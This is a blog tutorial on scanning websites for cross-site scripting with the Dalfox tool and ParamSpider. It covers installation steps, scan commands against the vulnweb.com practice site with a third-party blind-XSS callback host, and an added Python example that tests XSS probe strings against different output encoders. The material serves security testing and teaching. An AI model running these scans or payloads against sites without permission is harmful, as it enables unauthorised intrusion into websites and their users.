Hello friends, in today's article I will show you how to use the Dalfox tool to scan for XSS vulnerabilities. It is a pretty cool and interesting tool, very useful for pentest enthusiasts, and working pentesters like to use Dalfox as well. Before getting into the article, I will briefly introduce the concept of an XSS vulnerability and the Dalfox tool. Let's get to the main point!
Note: This article is for educational and research purposes only. Please do not carry out illegal attacks. Anonyviet will not be responsible for any illegal acts you commit!
Brief concept of XSS
Cross-Site Scripting (XSS) is a type of attack in which an attacker inserts malicious code into someone else's website; when a user visits that website, the malicious code is executed on the machine of the person using it. XSS can lead to loss of credibility, disclosure of private information, or attacks on users' machines.
Here's how it works: an XSS vulnerability is exploited by injecting malicious code into a web page or into an input form on a web page. When a user visits the page or enters data into that form, the malicious code is executed in the user's browser. It can read information from the user's browser, send it to another server, or perform other actions such as attacking the user's machine or damaging the site's credibility.
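To make the mechanism above concrete, here is an added example (not from the original article and not Dalfox code) of a page that reflects a pp query parameter, rendered with no encoding, with a partial filter, and with full HTML encoding. The host shop.example, the page template and both probe strings are constructed for the illustration.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed page: the "pp" value lands in two places, element text and an
# attribute value. Host name and template are made up for this example.
PAGE = '<p>Results for: {v}</p><input name="pp" value="{v}">'

def no_encoding(value):
    # Vulnerable: the value is written into the page exactly as received.
    return value

def angle_brackets_only(value):
    # Common partial fix: neutralises tags but leaves quotes untouched.
    return value.replace("<", "&lt;").replace(">", "&gt;")

def full_encoding(value):
    # Encodes & < > " ' so the value stays data in text and in quoted attributes.
    return html.escape(value, quote=True)

def render(url, encode):
    """Build the response for url, passing the pp parameter through encode."""
    value = parse_qs(urlsplit(url).query).get("pp", [""])[0]
    return PAGE.format(v=encode(value))

def reflected_raw(probe, encode):
    """True when the probe comes back unchanged, i.e. it would be parsed as markup."""
    url = "http://shop.example/search?pp=" + quote(probe)
    return probe in render(url, encode)

# Constructed probes, one per output context.
TAG_PROBE = "<script>alert(1)</script>"
ATTR_PROBE = '" onfocus="alert(1)'

def report():
    """Map each encoder name to (tag probe reflected raw, attribute probe reflected raw)."""
    rows = {}
    for name, encode in [("none", no_encoding),
                         ("angle brackets only", angle_brackets_only),
                         ("html.escape", full_encoding)]:
        rows[name] = (reflected_raw(TAG_PROBE, encode),
                      reflected_raw(ATTR_PROBE, encode))
    return rows

if __name__ == "__main__":
    for name, (tag, attr) in report().items():
        print(f"{name:20} tag probe raw: {tag!s:5}  attribute probe raw: {attr}")
```

Escaping only angle brackets stops the tag probe but still lets the attribute probe through, which is why the output has to be encoded for every context the value is written into.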
Dalfox – Pentest Web Application Tool
DalFox is a powerful open source XSS scanner, parameter analyzer and utility that speeds up the detection and verification of XSS bugs. It is a powerful, feature-rich testing tool well suited to pentesters. The author of this tool is HAHWUL, an engineer and security researcher. In addition, Dalfox is one of the most useful web application pentest tools available today, and every pentester should use it to find and fix security holes in websites.
How to install Dalfox tool
To use Dalfox, of course you need to install it :>, and installing Dalfox is quite simple. You just need to do the following:
For Kali Linux: copy the Python code below and save it under any name with the .py extension (here I save it as name.py). After pasting and saving the code, run the following command:
sudo apt install golang -y
then run the Python script with the command:
python filename.py
And so, Dalfox will be installed automatically on your Kali Linux machine.
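
#!/usr/bin/env python3
# Installs Go-based tools into /opt/<name> and links each binary into /usr/local/bin.
import os
import sys


def install_golang_module(module, name):
    gopath = "/opt/" + name
    if os.path.exists(gopath):
        return  # already installed
    print("Installing go module " + name)
    # GOPATH decides where "go install" puts the binary: $GOPATH/bin/<name>.
    # sudo -E keeps this variable when the command runs as root.
    os.environ["GOPATH"] = gopath
    cmdseries = [
        # On current Go releases "go get" no longer builds or installs binaries;
        # "go install <module>@latest" is used instead.
        "sudo -E go install -v " + module + "@latest",
        "sudo ln -s " + gopath + "/bin/" + name + " /usr/local/bin/" + name,
    ]
    for cmdstring in cmdseries:
        if os.system(cmdstring) != 0:
            sys.exit("Command failed: " + cmdstring)


if __name__ == '__main__':
    # (module path, binary name); Dalfox's current module path ends in /v2.
    golang_modules_to_install = [("github.com/hahwul/dalfox/v2", "dalfox")]
    for module, name in golang_modules_to_install:
        install_golang_module(module, name)
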
For Windows: just go to this link, download the file and extract it, then open a terminal and run it.
How to use Dalfox?
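To scan for XSS vulnerabilities on a website, use the following command syntax:
dalfox url <target-url> -b hawhul.xss.ht
The -b option sets the blind XSS callback address that Dalfox uses in its blind payloads, so replace hawhul.xss.ht with a callback host that you control.
For example (the URL is quoted so that the shell does not treat ? as a wildcard):
dalfox url "http://testphp.vulnweb.com:80/hpp/index.php?pp=FUZZ" -b hawhul.xss.ht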
And this is the result:
In addition, Dalfox has many other interesting commands; you can explore them yourself on Dalfox's GitHub page.
How to use Dalfox + ParamSpider for automatic vulnerability scanning
For those of you who do not know ParamSpider: it is a tool developed by Devansh Batham whose function is "mining parameters from the dark corners of the web". Roughly speaking, it crawls for URLs that could potentially be attacked.
How to install Paramspider:
git clone https://github.com/devanshbatham/ParamSpider.git
cd ParamSpider
pip install -r requirements.txt
or pip3 install -r requirements.txt
Then run it against a domain:
python paramspider.py -d <domain>
or python3 paramspider.py -d <domain>
How to combine ParamSpider + Dalfox:
Command syntax: python paramspider.py -d <domain> -o <output-file>.txt
For example:
python paramspider.py -d testphp.vulnweb.com -o vuln.xss
Output has the following form:
Now that we have the URLs, switch to Dalfox to scan each one.
The command syntax is as follows: dalfox file <path>\<output-file>.txt -b hawhul.xss.ht
For example: dalfox file vuln.xss -b hawhul.xss.ht
Here are the results many of you have been waiting for :>
So quite a lot of XSS payloads are shown!!!
That is the end of this article. I hope you learned something from it. If you come across any website with XSS vulnerabilities, please report it to the web admin right away; maybe you can even get some money for it, right? :))
Wishing you all a very nice day!
You can also read the article "10 websites to help you practice XSS hacking skills".